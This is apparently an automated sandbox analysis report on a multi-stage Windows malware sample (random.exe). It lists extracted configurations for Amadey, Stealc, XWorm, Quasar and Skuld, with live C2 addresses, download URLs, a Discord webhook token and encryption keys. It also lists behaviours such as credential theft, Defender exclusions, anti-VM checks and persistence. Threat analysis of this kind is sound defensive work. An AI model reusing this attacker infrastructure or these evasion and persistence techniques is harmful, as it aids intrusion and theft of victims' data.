Analysis
-
max time kernel
137s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2025, 12:43
Static task
static1
General
-
Target
random.exe
-
Size
5.5MB
-
MD5
8aa52be570da2efe4885957e29b89538
-
SHA1
2ad2e47c307b34d9a593e21dfe0dba723c110b3d
-
SHA256
a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107
-
SHA512
c685dd857057879a6ff8bdb7279511e940babeb7f358a94e33fea308ac0bd8ceb6d2bcd758dd38eada0995bb96f910d5728c1431286f0875d2ca392b0ca7308e
-
SSDEEP
98304:ZDpKjlkbVghclaJ8RhIc1pX452gw8QzbRwm5H3gzIFNM2w+1R:yxQZFzQQ/5HvX9
Malware Config
Extracted
http://196.251.91.42/up/uploads/encryption02.jpg
http://196.251.91.42/up/uploads/encryption02.jpg
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
skuld
https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E
Extracted
xworm
5.0
httpss.myvnc.com:1907
xWIArEKzuXpfRVkJ
-
install_file
USB.exe
Extracted
amadey
5.33
06bcb9
http://195.82.146.131
-
install_dir
06a5c50e21
-
install_file
tgvazx.exe
-
strings_key
1861b156ffe931ec912bb17b5ff77a36
-
url_paths
/h8ejjcsDs/index.php
Extracted
quasar
1.3.0.0
TELEGRAM
212.56.35.232:101
QSR_MUTEX_L5s39LpA1y9H79tL6D
-
encryption_key
oBOMHICrtHceojCPrnpp
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchosta
-
subdirectory
media
Signatures
-
Amadey family
-
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral1/memory/4584-782-0x0000000000400000-0x0000000000848000-memory.dmp family_vidar_v7 behavioral1/memory/4584-783-0x0000000000400000-0x0000000000848000-memory.dmp family_vidar_v7 behavioral1/memory/4584-930-0x0000000000400000-0x0000000000848000-memory.dmp family_vidar_v7 behavioral1/memory/4584-1326-0x0000000000400000-0x0000000000848000-memory.dmp family_vidar_v7 behavioral1/memory/4584-1333-0x0000000000400000-0x0000000000848000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/5804-819-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm behavioral1/memory/6000-899-0x0000000009850000-0x0000000009CE6000-memory.dmp family_xworm -
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/12944-31566-0x00000000002E0000-0x000000000033E000-memory.dmp family_quasar -
Skuld family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3300 created 1356 3300 Organizations.com 51 -
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ k3t05Da.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ tgvazx.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1P27l3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ advnrNo.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ RrRYo50.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2S4013.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3W01C.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 123 6000 powershell.exe 270 6000 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5676 powershell.exe 6168 powershell.exe 10768 powershell.exe 12156 powershell.exe 5280 powershell.exe 3964 powershell.exe 4408 powershell.exe 2932 powershell.exe 6408 powershell.exe 6000 powershell.exe 5580 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 34 1236 rapes.exe 34 1236 rapes.exe 34 1236 rapes.exe 34 1236 rapes.exe 34 1236 rapes.exe 243 1236 rapes.exe 243 1236 rapes.exe 284 1236 rapes.exe 285 1708 svchost.exe 308 1236 rapes.exe 313 4672 tgvazx.exe 282 1236 rapes.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6sQA7_6480\ImagePath = "\\??\\C:\\Windows\\Temp\\6sQA7_6480.sys" tzutil.exe -
Uses browser remote debugging 2 TTPs 11 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2196 chrome.exe 3168 chrome.exe 4808 chrome.exe 1596 msedge.exe 4932 msedge.exe 5008 msedge.exe 1748 msedge.exe 4844 chrome.exe 1572 chrome.exe 5564 msedge.exe 4660 msedge.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion k3t05Da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RrRYo50.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RrRYo50.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tgvazx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tgvazx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1P27l3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2S4013.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion k3t05Da.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3W01C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1P27l3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2S4013.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3W01C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation 1P27l3.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation zx4PJh6.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation k3t05Da.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation advnrNo.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation RrRYo50.exe -
Deletes itself 1 IoCs
pid Process 6644 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat cmd.exe -
Executes dropped EXE 31 IoCs
pid Process 3060 G8U31.exe 1588 1P27l3.exe 1236 rapes.exe 2476 2S4013.exe 3112 3W01C.exe 4848 50KfF6O.exe 4464 zx4PJh6.exe 3300 Organizations.com 2000 k3t05Da.exe 5052 rapes.exe 4584 advnrNo.exe 4924 wjfOfXh.exe 5804 k3t05Da.exe 5960 Kr9UTz2.exe 5868 OkH8IPF.exe 1524 weC48Q7.exe 5920 windowscore.exe 5908 ARxx7NW.exe 5524 0000000439.exe 5304 d3jhg_003.exe 1916 rapes.exe 6632 tK0oYx3.exe 4120 RrRYo50.exe 4672 tgvazx.exe 6644 w32tm.exe 6480 tzutil.exe 12632 Attributes.exe 12944 word.exe 7092 weC48Q7.exe 12044 windowscore.exe 12444 Kr9UTz2.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine RrRYo50.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine tgvazx.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 1P27l3.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 3W01C.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine advnrNo.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 2S4013.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe -
Loads dropped DLL 64 IoCs
pid Process 2000 k3t05Da.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 5920 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe 12044 windowscore.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x00070000000240a7-650.dat agile_net behavioral1/memory/2000-663-0x00000000006C0000-0x0000000000CAC000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x00070000000240b6-669.dat themida behavioral1/memory/2000-673-0x0000000070200000-0x00000000707E0000-memory.dmp themida behavioral1/memory/2000-675-0x0000000070200000-0x00000000707E0000-memory.dmp themida behavioral1/memory/2000-676-0x0000000070200000-0x00000000707E0000-memory.dmp themida behavioral1/memory/2000-718-0x0000000070200000-0x00000000707E0000-memory.dmp themida behavioral1/memory/2000-823-0x0000000070200000-0x00000000707E0000-memory.dmp themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" random.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" G8U31.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" 50KfF6O.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10299120121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k3t05Da.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1900 tasklist.exe 4032 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1588 1P27l3.exe 1236 rapes.exe 2476 2S4013.exe 3112 3W01C.exe 5052 rapes.exe 4584 advnrNo.exe 1916 rapes.exe 4120 RrRYo50.exe 4672 tgvazx.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2000 set thread context of 5804 2000 k3t05Da.exe 153 PID 5960 set thread context of 2644 5960 Kr9UTz2.exe 161 PID 5868 set thread context of 5756 5868 OkH8IPF.exe 181 PID 6632 set thread context of 2820 6632 tK0oYx3.exe 203 PID 12444 set thread context of 6208 12444 Kr9UTz2.exe 228 -
resource yara_rule behavioral1/files/0x000e000000023f66-50.dat upx behavioral1/memory/4848-60-0x0000000000550000-0x0000000000FDE000-memory.dmp upx behavioral1/memory/4848-62-0x0000000000550000-0x0000000000FDE000-memory.dmp upx behavioral1/memory/6192-32369-0x0000000000F40000-0x00000000019CE000-memory.dmp upx behavioral1/memory/6192-32492-0x0000000000F40000-0x00000000019CE000-memory.dmp upx -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\RuntimeApp\0000000439.exe ARxx7NW.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\word.exe powershell.exe File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe File created C:\Windows\Tasks\tgvazx.job RrRYo50.exe File created C:\Windows\Tasks\rapes.job 1P27l3.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe File opened for modification C:\Windows\CylinderPair zx4PJh6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5188 3300 WerFault.exe 116 -
System Location Discovery: System Language Discovery 1 TTPs 49 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2S4013.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language G8U31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wjfOfXh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language word.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgvazx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizations.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language advnrNo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k3t05Da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d3jhg_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3W01C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k3t05Da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RrRYo50.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1P27l3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 10808 netsh.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 advnrNo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString advnrNo.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5016 timeout.exe 2476 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871210557025010" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5708 schtasks.exe 5536 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1588 1P27l3.exe 1588 1P27l3.exe 1236 rapes.exe 1236 rapes.exe 2476 2S4013.exe 2476 2S4013.exe 2476 2S4013.exe 2476 2S4013.exe 2476 2S4013.exe 2476 2S4013.exe 3112 3W01C.exe 3112 3W01C.exe 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 5052 rapes.exe 5052 rapes.exe 4584 advnrNo.exe 4584 advnrNo.exe 4584 advnrNo.exe 4584 advnrNo.exe 4924 wjfOfXh.exe 4924 wjfOfXh.exe 4584 advnrNo.exe 4584 advnrNo.exe 4844 chrome.exe 4844 chrome.exe 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 3300 Organizations.com 4164 svchost.exe 4164 svchost.exe 4164 svchost.exe 4164 svchost.exe 5676 powershell.exe 5676 powershell.exe 5676 powershell.exe 6000 powershell.exe 6000 powershell.exe 6000 powershell.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 4584 advnrNo.exe 4584 advnrNo.exe 5620 powershell.exe 5620 powershell.exe 5620 powershell.exe 4584 advnrNo.exe 4584 advnrNo.exe 2644 MSBuild.exe 2644 MSBuild.exe 2644 MSBuild.exe 2644 MSBuild.exe 4584 advnrNo.exe 4584 advnrNo.exe 5756 MSBuild.exe 5756 MSBuild.exe 5756 MSBuild.exe 5756 MSBuild.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6480 tzutil.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5304 d3jhg_003.exe 5304 d3jhg_003.exe 5304 d3jhg_003.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 4844 chrome.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeDebugPrivilege 4848 50KfF6O.exe Token: SeDebugPrivilege 1900 tasklist.exe Token: SeDebugPrivilege 4032 tasklist.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeDebugPrivilege 2000 k3t05Da.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeDebugPrivilege 5676 powershell.exe Token: SeDebugPrivilege 6000 powershell.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeDebugPrivilege 5804 k3t05Da.exe Token: SeShutdownPrivilege 4844 chrome.exe Token: SeCreatePagefilePrivilege 4844 chrome.exe Token: SeDebugPrivilege 5620 powershell.exe Token: SeDebugPrivilege 5920 windowscore.exe Token: SeDebugPrivilege 5580 powershell.exe Token: SeDebugPrivilege 6168 powershell.exe Token: SeDebugPrivilege 5524 0000000439.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeIncreaseQuotaPrivilege 5620 powershell.exe Token: SeSecurityPrivilege 5620 powershell.exe Token: SeTakeOwnershipPrivilege 5620 powershell.exe Token: SeLoadDriverPrivilege 5620 powershell.exe Token: SeSystemProfilePrivilege 5620 powershell.exe Token: SeSystemtimePrivilege 5620 powershell.exe Token: SeProfSingleProcessPrivilege 5620 powershell.exe Token: SeIncBasePriorityPrivilege 5620 powershell.exe Token: SeCreatePagefilePrivilege 5620 powershell.exe Token: SeBackupPrivilege 5620 powershell.exe Token: SeRestorePrivilege 5620 powershell.exe Token: SeShutdownPrivilege 5620 powershell.exe Token: SeDebugPrivilege 5620 powershell.exe Token: SeSystemEnvironmentPrivilege 5620 powershell.exe Token: SeRemoteShutdownPrivilege 5620 powershell.exe Token: SeUndockPrivilege 5620 powershell.exe Token: SeManageVolumePrivilege 5620 powershell.exe Token: 33 5620 powershell.exe Token: 34 5620 powershell.exe Token: 35 5620 powershell.exe Token: 36 5620 powershell.exe Token: SeLoadDriverPrivilege 6480 tzutil.exe Token: SeDebugPrivilege 13084 powershell.exe Token: SeDebugPrivilege 10768 powershell.exe Token: SeDebugPrivilege 12156 powershell.exe Token: SeDebugPrivilege 12044 windowscore.exe Token: SeDebugPrivilege 5280 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
